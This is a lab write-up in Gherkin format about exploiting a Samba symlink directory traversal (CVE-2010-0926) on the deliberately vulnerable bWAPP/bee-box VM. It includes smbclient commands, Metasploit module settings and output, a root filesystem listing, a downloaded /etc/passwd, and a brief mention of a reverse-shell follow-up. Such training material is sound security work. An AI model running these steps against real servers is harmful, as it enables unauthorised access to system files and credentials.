## Version 1.4.0
## language: en

Feature:
  TOE:
    bWAPP
  Category
    A5 - Security Misconfiguration
  Page name:
    bWAPP/sm_samba.php
  CWE:
    CWE-22: Path Traversal
  Goal:
    Exploit Samba to access the server's filesystem
  Recommendation:
    Update Samba to a patched version

  Background:
  Hacker's software:
    | <Name>          | <Version>          |
    | Kali GNU/Linux  | 4.18.0-kali1-amd64 |
    | Firefox Quantum | 60.2.0             |
    | metasploit      | v4.17.24-dev       |
    | Samba           | 4.9.1-Debian       |
  TOE information:
    Given I am accessing the site bWAPP/sm_samba.php
    And enter a php site that allows me to change my account secret
    And the site is running on bee-box 1.6.7 in Virtualbox 5.2.18:
    """
    Ubuntu 8.04, kernel=2.6.24-16-generic, MySQL 5.0.99, Apache 2.2.8, PHP 5.2.4
    Samba 3.0.28a
    """
    And the site is running on low security_level

  Scenario: Normal use case
  Accessing bWAPP site and Samba
    Given I access the site
    And I see the following message:
    """
    The Samba server is configured insecurely, it allows an attacker to read \
    or write arbitrary files! (bee-box only)

    HINT: defacement is possible...
    """
    Then I try to list the available samba shares from my bee-box VM:
    """
    $ smbclient -L //192.168.56.101
    Enter WORKGROUP\dsalazar's password: #Empty password field
    """
    And get:
    """
    Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       IPC Service (bee-box server (Samba 3.0.28a))
        opt             Disk
        tmp             Disk      oh noes!
    ... #Unimportant lines
    """
    Then I try to make an anonymous connection to the tmp folder:
    """
    smbclient //192.168.56.101/tmp
    """
    And it successfully connects
    Then I can use all Samba's functionalities within the server's tmp folder

  Scenario: Static detection
  Server's Samba version is vulnerable to directory traversal attacks
    Given I now have access to the server's tmp folder via Samba
    Then I look on the Internet for possible exploits
    And I find this one: "https://www.cvedetails.com/cve/cve-2010-0926"
    And I see that it affects all Samba versions before 3.3.11
    And as the server's Samba Version is 3.0.28a
    Then I deduce that the exploit is feasible

  Scenario: Dynamic detection
  Sending a link to a bWAPP user and making him purchase tickets for me
    Given I already know I can use the previous exploit
    Then I run:
    """
    msfconsole
    """
    And I select the samba_symlink_traversal exploit:
    """
    msf > use auxiliary/admin/smb/samba_symlink_traversal
    """
    And I see the options:
    """
    msf auxiliary(admin/smb/samba_symlink_traversal) > show options

    Module options (auxiliary/admin/smb/samba_symlink_traversal):

       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       RHOST                       yes       The target address
       RPORT      445              yes       The SMB service port (TCP)
       SMBSHARE                    yes       The name of a writeable \
       share on the server
       SMBTARGET  rootfs           yes       The name of the directory \
       that should point to the root filesystem
    """
    Then I proceed to build the payload by setting RHOST with the server's IP:
    """
    set RHOST 192.168.56.101
    """
    And SMBSHARE with the server's
    """
    set SMBSHARE tmp
    """
    And I execute the payload:
    """
    run
    """
    Then I get the output:
    """
    [*] 192.168.56.101:445 - Connecting to the server...
    [*] 192.168.56.101:445 - Trying to mount writeable share 'tmp'...
    [*] 192.168.56.101:445 - Trying to link 'rootfs' to the root filesystem...
    [*] 192.168.56.101:445 - Now access the following share to browse \
    the root filesystem:
    [*] 192.168.56.101:445 -        \\192.168.56.101\tmp\rootfs\

    [*] Auxiliary module execution completed
    """
    Then I connect to tmp via smbclient as shown in the Normal use case section
    And I list the directories using "ls"
    And get the following output:
    """
    ... #Unimportant folders
    rootfs                              D        0  Thu Nov 22 12:38:17 2018
    ... #Unimportant folders

                  19891060 blocks of size 1024. 15589476 blocks available
    """
    Then I access the folder:
    """
    smb: \> cd rootfs\
    """
    And list directories:
    """
    smb: \rootfs\> ls
    """
    And see that I actually got to the root of the server:
    """
    .                                   D        0  Thu Nov 22 12:38:17 2018
      ..                                  D        0  Thu Nov 22 12:38:17 2018
      bin                                 D        0  Thu Mar 28 14:15:46 2013
      tmp                                 D        0  Thu Nov 22 15:36:01 2018
      sys                                 D        0  Thu Nov 22 12:38:03 2018
      proc                               DR        0  Thu Nov 22 12:38:03 2018
      boot                                D        0  Thu Mar 28 15:23:01 2013
      etc                                 D        0  Thu Nov 22 12:38:31 2018
      opt                                 D        0  Tue Apr 22 12:48:59 2008
      media                               D        0  Tue Apr 22 12:48:59 2008
      toolbox                             D        0  Mon Apr  1 15:42:27 2013
      lib                                 D        0  Mon Apr  1 11:40:57 2013
      root                                D        0  Thu Nov 22 12:38:18 2018
      dev                                 D        0  Thu Nov 22 12:38:24 2018
      initrd                              D        0  Tue Apr 22 12:48:59 2008
      cdrom                               D        0  Thu Mar 28 14:09:30 2013
      var                                 D        0  Fri Apr 18 13:58:25 2014
      usr                                 D        0  Thu Mar 28 14:59:08 2013
      lost+found                          D        0  Thu Mar 28 14:09:28 2013
      lib64                               D        0  Thu Mar 28 14:59:09 2013
      home                                D        0  Thu Dec 12 07:03:56 2013
      vmlinuz                             N  1904248  Thu Apr 10 11:51:33 2008
      mnt                                 D        0  Thu Mar 28 15:22:34 2013
      srv                                 D        0  Tue Apr 22 12:48:59 2008
      initrd.img                          N  7475772  Thu Mar 28 15:23:00 2013
      sbin                                D        0  Thu Mar 28 20:15:39 2013

                    19891060 blocks of size 1024. 15589476 blocks available
    """
    Then I conclude that the vulnerability is present

  Scenario: Exploitation
  Navigating the filesystem
    Given I have access to the whole filesystem now
    Then I can start reading some interesting files:
    Then I download etc/passwd file from the server:
    """
    smb: \rootfs\> get etc\passwd aaa
    """
    And I open the file from my pc:
    """
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    ... #More lines
    """
    Then I go to the bwapp directory:
    """
    smb: \rootfs\> cd var\www\bWAPP
    """
    And list directories:
    And find out I have access to the site's code
    """
      1
      smb: \rootfs\var\www\bWAPP\> ls
    .                                   D        0  Thu Nov 22 16:15:05 2018
    ..                                  D        0  Sun Nov  2 17:52:04 2014
    ba_pwd_attacks_4.php                N     8039  Sun Nov  2 17:52:04 2014
    information_disclosure_3.php        N     6911  Sun Nov  2 17:52:04 2014
    index.php                           N      690  Sun Nov  2 17:52:04 2014
    insecure_direct_object_ref_1.php      N     8515  Sun Nov  2 17:52:04 2014
    connect.php                         N     1303  Sun Nov  2 17:52:04 2014
    portal.bak                          N     6594  Sun Nov  2 17:52:04 2014
    connect_i.php                       N     1027  Sun Nov  2 17:52:04 2014
    ssrf.php                            N     5322  Sun Nov  2 17:52:04 2014
    sqli_10-2.php                       N     1859  Sun Nov  2 17:52:04 2014
    ssii.php                            N     6546  Sun Nov  2 17:52:04 2014
    insecure_crypt_storage_1.php        N     5299  Sun Nov  2 17:52:04 2014
    bof_2.php                           N     4804  Sun Nov  2 17:52:04 2014
    apps                                D        0  Sun Nov  2 17:52:04 2014
    ba_captcha_bypass.php               N     6623  Sun Nov  2 17:52:04 2014
    insuff_transp_layer_protect_3.php      N     4879  Sun Nov  2 17:52:04 2014
    reset.php                           N    13403  Sun Nov  2 17:52:04 2014
    web.config                          N     7556  Sun Nov  2 17:52:04 2014
    passwords                           D        0  Sun Nov  2 17:52:04 2014
    logs                                D        0  Thu Oct 25 15:58:30 2018
    inoffensive-link.php                N      474  Fri Oct 26 19:25:44 2018
    sqli_1.php                          N     7232  Sun Nov  2 17:52:04 2014
    sqli_6.php                          N     7241  Sun Nov  2 17:52:04 2014
    xss_href-2.php                      N     6920  Sun Nov  2 17:52:04 2014
    sqli_8-2.php                        N     2395  Sun Nov  2 17:52:04 2014
    """
    Then I conclude that I can navigate through forbiden directories
    And watch as many files as the permissions I have allow me

  Scenario: Remediation
  Update samba a patched version
    Given I know what versions of Samba are affected by the exploit I used
    Then I sould be able to update the Samba engine on bWAPP
    And get rid of the vulnerability.
    But as updating is just too complicated
    And doing it for a bWAPP VM is not worth it.

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.7/10 (High) - AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.3/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    5.8/10 (Medium) - CR:L/IR:L/AR:L

  Scenario: Correlations
    systems/bwapp/other-bugs-unrestricted-file-upload/dsalazaratfluid.feature
      Given I access the root directory using the exploit described in this file
      And upload a payload file for reverse ssh to "\var\www\bWAPP\images\"
      And then I open the file from my browser (images folder is accesible)
      Then I would be able to create a reverse ssh session with www-data user
